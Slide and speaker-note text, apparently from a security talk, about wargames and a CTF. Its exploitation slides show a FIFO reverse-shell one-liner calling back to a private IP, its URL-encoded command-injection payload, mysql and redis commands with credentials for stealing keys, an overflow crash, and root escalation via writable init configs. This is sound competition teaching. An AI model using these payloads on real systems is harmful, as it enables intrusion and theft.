26. Playing wargames I got to:
Implement a padding oracle attack against RSA
Despair at the state of PHP
Implement a CPU timing attack
Exploit a kernel stack buffer overflow
Create a JS VM for a custom processor architecture
Write lots of custom shellcode
XOR all the things
38. CTF challenge - jacked
# nc jacked.final2012.ghostintheshellcode.com 2121
Jack's Blackjack Simulator
Blackjack pays 2:1
Dealer must hit soft 17
Single deck, shuffled after every round
Enter your name:
pwn
Your table companions:
Player 1 is Tracy with $1332
Player 2 is Grace with $770
Player 3 is Curtis with $1376
Player 4 is Bryan with $1950
You have $1000
Place your bet (zero to exit): $
39. CTF challenge - jacked
$1,000,000,000 will win the game
Good random source
32bit seed
Player 1 is Tracy with $1332
Player 2 is Grace with $770
Player 3 is Curtis with $1376
Player 4 is Bryan with $1950
41. CTF challenge - Folly
Text adventure
On winning, enter shellcode
Binary is chrooted, make custom code
Read “key” file...
get another port and binary
42. CTF challenge - Folly
x86_64
x86
ARM
ARM Thumb
PPC
Alpha
Cris
56. Recon - scoring
Packet captures shed some light
Regular "scoring rounds“
Every 30 minutes
Scoring server stores new keys in
services and checks for previous
keys
96. Servicemon - exploitation
Never mind keys, I want a shell
contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
nc: invalid option -- 'e'
97. Servicemon - exploitation
Stand back... I know bash*
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc 192.168.1.75 31337 >/tmp/f
http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp
%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%
2Ftmp%2Ff%7C%2Fbin%2Fsh%20-
i%202>%261%7Cnc%20192.168.1.75%203133
7%20>%2Ftmp%2Ff
* totally copied from somewhere
98. Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
I got a shell!
Now I can have some fun!
101. Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e
"select status from statuses order by created_at desc
limit 1;"
mysql --user=pastie --password=J@cobsClub$ paste -e
"select pastie from pastie order by date desc limit 1;"
OUTPUT=redis-cli -r 1 keys * | tail -n 1
redis-cli -r 1 lrange $OUTPUT 0 1
102. Leave a calling card
echo 'Look behind you! A three-headed monkey!' >
/services/pastie/.win
106. Escalation – the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf
107. Escalation – the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth
108. Escalation – the hard way
When auth starts we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "n"' |
nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*]
accepted
# whoami
root
109. Escalation – the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, %x(whoami))
root
Who here has played a CTF before? And how about wargames?
Next to look at some wargames sites
Pick a link
The links show different images. Interesting.
Trying to view page source
Trying to view the admin directory. What files control basic authentication?
I’m not going to go through this binary challenge, but it does give you an idea of the level of tutorial in some games.
This is the typical wargames experience.
There are lots of wargames around – I have some specific recommendations at the end
Often same kinds of challenges as wargames. Lots of exploitation!By “progressive” I mean that you can generally attempt any tasks rather than having to complete “easier” ones first.
Challenge-based also called “jeopardy” style
After this, let’s look at some CTF scoreboards
From these values we can brute-force calculate the initial seed. Thanks to Paco Hope for a great DC4420 talk on randomness!Then we can start the program, give it that seed, and see for each hand whether we’ll win or lose. We need ONE BILLION DOLLARS to win.
So when we win, this code is reached. Can anyone see how we’d actually exploit this?
Running on port 443, simple web interface.
Enter whatever text you want, choose a “language”, hit submit
Click to show random text highlighted.Recon shows that the “keys” are entered as pastes and then checked again later.
Digging into how pastie works
The “defence” side is something you don’t get in wargames or challenge CTFs, so this was all new to me
Ran mysql against my instance to figure out the query needed to get data out.
And that’s the pastie service done
Where to start? Just browsing through piles of incomprehensible ruby.
Let’s verify that this does what it looks like it does.No 250 response code, just closes the connection.
So how to exploit? I want to get the keys out.
It doesn't seem to respond to much
I love binary exploitation. I used to think I was ok at it.
What does it actually do?
Who can name a dangerous C function?
Classic SBO, surely this gives remote pre-auth code execution?
Nope
Welcome to CTF rage. Remember this buffer here? Well before we return from the function it gets written to. But we've nuked whatever value is there, so the program tries to write to junk memory, and crashes.
Memory map of auth process
When we add the implicit zeroes in, we can see that all of the writable memory addresses have zeroes in them. And since our exploitation path is via strcpy, we can’t put nulls in the address because we need to keep overwriting up to the return address.
Now for my l33t exploit. Nope. Out of time.
Apache, running on port 3000
Found the ruby code being run. It looks like it monitors other services.
It can also get hashes of files. Can anyone guess what the exploit is yet?
It can also get hashes of files. Can anyone guess what the exploit is yet?
Semicolons didn’t work, I’m not entirely sure why. Elegance is not the aim!
Trick to use FIFOs to create a connectback shell. Urlencodes to a bit of a mouthful.
We start a listener
Defense in depth! At this point I can basically go raiding all the keys from any machine, unless they’ve changed several passwords.
Last one changes them back to their home directory before each command.
We’re hackers. Go root or go home.
You've got a shell, now what?They've changed the password, so sudo doesn't work!What can we edit, configuration-wise?
Auth runs as root. We can make something else run as root. How about our connect-back code?
How do we go about making auth restart? Lame DoS. Root.
Just give it a go. Try some wargames. You will get stuck. Persist!For CTFs, find some buddies, maybe here @ Bsides, and get a team together!
Everyone knows you shouldn’t trust client-side data. These plugins help you make client-side data particularly untrustworthy.
Bandit isn’t really much of a wargame – it will give you some Linux skills which will be useful though
I like learning, I enjoy it. Some people like money.